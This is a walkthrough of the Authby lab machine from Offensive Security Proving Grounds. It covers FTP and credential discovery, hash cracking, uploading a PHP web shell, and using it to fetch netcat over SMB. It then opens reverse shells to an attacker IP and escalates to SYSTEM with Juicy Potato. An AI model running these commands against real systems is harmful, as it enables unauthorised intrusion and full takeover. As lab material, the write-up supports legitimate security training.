Authby
Writeup for Authby from Offensive Security Proving Grounds (PG)
Last updated
Was this helpful?
Writeup for Authby from Offensive Security Proving Grounds (PG)
Last updated
Was this helpful?
nmapAutomator.sh -H 192.168.85.46 -t full
nmapAutomator.sh -H 192.168.85.46 -t vulns
Anonymous login allowed.
While we cannot access these files, we can see that there are some account names.
Using the account admin:admin, we get access to some other files.
The .htaccess and .htpasswd files are leaked.
.htaccess
.htpasswd
Passing the .htpasswd hash into John the Ripper, we find the credentials to authenticate into the HTTP server.
Using the previously found credentials (offsec:elite), we can authenticate into the application.
gobuster dir -u http://192.168.85.46:242/ -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite
gobuster dir -u http://192.168.85.46:242/phpmyadmin -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite -s 200,204,301,302,307,401
Using the PHP backdoor from /usr/share/webshells/php/simple-backdoor.php, we can upload this backdoor through the admin FTP account to the web root. Then, we can visit the simple-backdoor.php and use the cmd= parameter to achieve RCE.
Copy nc.exe through SMB:
http://192.168.85.46:242/simple-backdoor.php?cmd=copy \\192.168.49.85\ROPNOP\netcat\nc.exe .
Trigger a reverse shell:
http://192.168.85.46:242/simple-backdoor.php?cmd=nc.exe -e cmd.exe 192.168.49.85 443
On our listening machine, we get a reverse shell.
First, we know that SeImpersonatePrivilege is enabled.
We can perform privilege escalation using Juicy Potato.
However, there are two challenges.
The default CLSID doesn't work. Juicy Potato will return COM -> recv failed with error: 10038.
systeminfo shows that this is Windows Server 2008.
Now, we can use the nc.exe we transferred previously to get another reverse shell, this time with SYSTEM privileges.
juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.49.85 443" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
On our listening machine:
This is an x86 system, so we need an x86 Juicy Potato executable. I used the one from here:
We can use one of the BITS CSLIDs from here: . I used {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}.
